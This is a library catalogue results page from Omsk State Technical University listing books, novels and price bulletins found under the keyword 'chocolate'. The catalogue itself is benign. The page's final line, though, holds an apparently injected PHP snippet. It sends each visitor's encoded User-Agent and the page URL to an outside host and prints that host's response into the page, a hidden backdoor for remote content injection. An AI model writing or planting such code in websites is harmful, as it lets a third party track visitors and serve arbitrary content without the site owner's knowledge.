Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

281 пользователей


Зарегистрированных: 1 

Гавриленко Сергей Вячеславович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Шоколад")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 32
1. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
2. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
3. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

4. 
Харрис, Джоанн. Шоколад [Текст] : роман / Д. Харрис ; пер. И. Новоселецкая, 2010. - 399 с.
Держатели документа (Информация об экземплярах) 
5. 
Веселов С. В. Потребительский и рекламный рынки России: анализ взаимосвязи, состояния и перспектив развития [Текст] / С. В. Веселов, В. А. Музыко, А. В. Столярова, 2013. - 668 с.
Держатели документа (Информация об экземплярах) 
6. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
7. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2004. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

8. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

9. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
10. 
Применение холода в пищевой промышленности. Холод в рыбной и пищевой промышленности [Текст] : справочник / сост.: Н. Я. Барулин [и др.], 1979. - 150, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за октябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
12. 
Харрис, Джоанн. Шоколад [Текст] : роман / Джоанн Харрис ; пер. с англ. И. Новоселецкой, 2007. - 378, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Эскивель, Лаура. Шоколад на крутом кипятке [Текст] : Роман-календарь с рецептами блюд, содержащий описание домаш. средств и любов. связей / Л. Эскивель; П. Грушко, 1999. - 255 с.
Держатели документа (Информация об экземплярах) 
14. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
15. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
16. 
Трудные повести [Текст] / авт. предисл., сост. и авт. примеч. А. И. Ванюков, 1990. - 541, [2] с.
Оглавление 
  • Вольнов, И. Встреча / И. Вольнов
  • Сергеев-Ценский, Сергей Николаевич. Жестокость / С. Н. Сергеев-Ценский
  • Тарасов-Родионов, А. Шоколад / А. Тарасов-Родионов
  • Пильняк, Б. Повесть непогашенной луны / Б. Пильняк
  • Булгаков, М. Собачье сердце / М. Булгаков
  • Малашкин, С. Луна с правой стороны, или необыкновенная любовь / С. Малашкин
  • Малашкин, Сергей Иванович. Луна с правой стороны, или необыкновенная любовь / С. И. Малашкин. - с.449
17. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за ноябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
18. 
Индексы потребительских цен на товары в Омской области в сентябре 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 34 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЙ -- НЕПРОДОВОЛЬСТВЕННЫЙ -- МЯСО -- РЫБА -- МАСЛО -- МОЛОКО -- ЯЙЦО -- САХАР -- ШОКОЛАД -- ЧАЙ -- КОФЕ -- МУКА -- ХЛЕБ -- КРУПА -- ОВОЩИ -- ФРУКТЫ -- ВОДКА -- ВИНО -- ТКАНЬ -- ОДЕЖДА -- БЕЛЬЕ -- МЕХ -- ТРИКОТАЖ -- ОБУВЬ -- ГАЛАНТЕРЕЯ -- ТАБАК -- МЕБЕЛЬ -- КОВЕР -- ПОСУДА -- ЧАСЫ -- ЭЛЕКТРОТОВАРЫ -- КАНЦТОВАРЫ -- ТЕЛЕРАДИОТОВАРЫ -- КОМПЬЮТЕР -- СВЯЗЬ -- ИГРУШКА -- МАТЕРИАЛ -- СТРОИТЕЛЬНЫЙ -- ЮВЕЛИРНОЕ -- ИЗДЕЛИЕ -- АВТОМОБИЛЬ -- БЕНЗИН -- МЕДИЦИНСКИЙ -- МЕДИКАМЕНТЫ -- ТОПЛИВО -- САДОВОДСТВО
Держатели документа (Информация об экземплярах) 
19. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за август 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
20. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.75 с.12 запросов, 1.16c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;